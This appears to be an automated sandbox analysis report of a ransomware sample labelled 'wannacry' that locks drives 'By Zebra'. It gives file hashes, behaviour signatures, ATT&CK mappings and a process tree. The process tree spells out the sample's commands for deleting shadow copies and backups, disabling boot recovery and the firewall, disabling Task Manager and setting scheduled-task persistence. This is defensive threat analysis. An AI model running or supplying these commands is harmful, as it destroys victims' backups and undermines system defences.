Analysis
-
max time kernel
150s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
-
submitted
28-04-2024 03:50
General
-
Target
2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
-
Size
987KB
-
MD5
7f3607674f31dd96e4d6a009cb4dfb7e
-
SHA1
5ebce6ec9924dc24e73a1faef6934128ea46c28c
-
SHA256
ab1ead6628df92a6cf9e0aee75bdf3ad9e7bf7e9067baf2a5a83adbf4cfd5d02
-
SHA512
68e0aff21d3ee5d24794c1d46f5a13fdc6af63f299ff175f74f89443b7edbcf09f7a96fdd43d64ed44e8336f37bfdc1c1806a2103846bbb2e14593fc0a125c06
-
SSDEEP
12288:ut3UkyTa5ziXxqf8FLpqf77yAJKrMCLSoJjvN+MyjLvBG1YJX8ORnu:TkbsLpqDuA7E3cRnu
Score
9/10
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 1 IoCs
-
Detects command variations typically used by ransomware 1 IoCs
-
Detects executables containing many references to VEEAM. Observed in ransomware 1 IoCs
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
-
Deletes System State backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
-
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
-
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Drops startup file 7 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 64 IoCs
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe"C:\Users\Admin\AppData\Local\Temp\2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe"1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C attrib +h +s "C:\Users\Admin\AppData\Local\Temp\2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe"3⤵
- Views/modifies file attributes
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "ZEBRA" /tr "C:\Users\Admin\AppData\Local\Temp\2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe"2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP3⤵
- Deletes System State backups
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet3⤵
- Deletes backup catalog
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C wmic SHADOWCOPY /nointeractive2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label A: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel A: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label B: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel B: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label C: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel C: Locked By Zebra3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label D: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel D: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label E: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel E: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label F: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel F: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label G: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel G: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label H: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel H: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label I: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel I: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label J: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel J: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label K: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel K: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label L: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel L: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label M: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel M: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label N: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel N: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label O: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel O: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label P: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel P: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label Q: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel Q: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label R: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel R: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label S: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel S: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label T: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel T: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label U: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel U: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label V: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel V: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label W: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel W: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label X: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel X: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label Y: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel Y: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C label Z: Locked By Zebra2⤵
-
C:\Windows\system32\label.exelabel Z: Locked By Zebra3⤵
- Enumerates connected drives
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\!HELP FILES ENCRYPTED!.txt2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify System Firewall
1Indicator Removal
4File Deletion
4Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\!HELP FILES ENCRYPTED!.txtFilesize
922B
MD576c36a2be8207db056ecd89b9b6df025
SHA15e86f6eda39e6b1b51bdd6deabdad40d450b4069
SHA256624e9f317b2e9d231c9c983976e1e5eec6bae74e7ff9d84239bc2135ebaa1dff
SHA512c842cbdf9378848934920595eed61f7def666659ea1e9810e746d83b814dec433d587940fadf34bbad7751b66ac96166f74db3443f781c0df6ec7acb42d0a1c0
-
C:\$Recycle.Bin\S-1-5-21-3627615824-4061627003-3019543961-1000\desktop.iniFilesize
463B
MD500aafdd13be543dcc56ca24ce4a9885c
SHA1dbfa502217bbc3d4e15e9af3cf43841d224d009e
SHA25665f2861f81879e6668ffb143f771b7df6ef8788c03eb53671d45996d49542c04
SHA512647fcaf2a93b746cf77fe9db6782b29033c43c61e0a19a0a04ac0ed1cb5d32f9313270c96cc3693c8998ef6c3640f9b581131612c83dee899ca5462429244f22
-
memory/3044-0-0x0000000000F80000-0x000000000107C000-memory.dmpFilesize
1008KB
-
memory/3044-1-0x000007FEF61B0000-0x000007FEF6B9C000-memory.dmpFilesize
9.9MB
-
memory/3044-2-0x0000000000530000-0x00000000005B0000-memory.dmpFilesize
512KB
-
memory/3044-2188-0x000007FEF61B0000-0x000007FEF6B9C000-memory.dmpFilesize
9.9MB
-
memory/3044-2609-0x0000000000530000-0x00000000005B0000-memory.dmpFilesize
512KB